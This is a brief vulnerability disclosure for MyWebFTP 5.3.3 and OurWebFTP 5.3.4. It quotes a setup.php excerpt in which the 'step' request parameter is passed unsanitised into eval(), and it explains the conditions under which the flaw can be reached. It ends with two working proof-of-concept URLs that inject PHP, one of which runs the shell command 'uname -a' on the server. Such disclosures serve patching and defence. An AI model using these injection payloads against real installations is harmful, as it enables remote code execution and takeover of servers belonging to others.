MyWebFTP 5.3.3 & OurWebFTP 5.3.4 Remote PHP Code Execution Vulnerability
by condis
04.10.2011

download: http://www.mywebftp.com/download.php
          http://www.ourwebftp.com/download.php

Source of setup.php:

	30. 	start_html();
	31. 	if( checkReady() ){					[1]
	32. 		init();
	33. 		listSetupOptions();
	34. 		if ( isset($_REQUEST['step']) ){
	35. 			$step = $_REQUEST['step'];			
	36. 			eval("step_$step();");			[!]
	37. 		}
	

To exploit this issue, everything must be configured propely so that installation 
can be done without any errors [1]. To meet these conditions all you have to do
is make sure that there is directory with name defined in LD_DIR const with 
permission to write into it, and that the administrator haven't deleted setup.php


Proof of Concept:
	
	http://host.tld/myftpdir/setup.php?step=;phpinfo();//
	http://host.tld/myftpdir/setup.php?step=;print_r(`uname -a`);//